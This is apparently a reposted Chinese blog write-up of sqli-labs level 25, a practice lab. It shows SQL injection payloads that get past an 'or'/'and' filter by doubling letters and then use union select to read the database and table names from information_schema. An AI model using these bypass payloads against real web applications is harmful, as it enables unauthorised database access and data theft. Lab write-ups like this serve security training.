sqli--labs(25)

博客主要讲述了过滤了or和and的get注入相关内容。先进入测试阶段,通过判断报错情况确定闭合方式,发现过滤or和and后继续构造。还涉及爆数据库名、爆破表名等操作,最后提到部分构造未成功。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

过滤了 or and 的get注入

0X01测试阶段

’报错 ” 不报错 那么就是'闭合

好的我们知道闭合后来#闭合后面

?id=1' order by 1 and '1'='1

语法不正确 发现过滤了 or and

那么我们继续构造

?id=1' oorrder by 1 anandd '1'='1

0X01爆数据库名

?id=-1' union select 1,database(),3 anandd '1'='1

 

 0X02爆破表名

?id=-1' union select 1,table_name from information_schema.tables where table_schema='security',3 anandd '1'='1

formation 的or

?id=-1' union select 1,(select table_name from infoorrmation_schema.tables where table_schema='security' limit 0,1),3 anandd '1'='1

 

成功

但是 为什么这样会不成功

?id=-1' union select 1,table_name from infoorrmation_schema.tables where table_schema='security',3 anandd '1'='1

 

转载于:https://www.cnblogs.com/-zhong/p/10935186.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值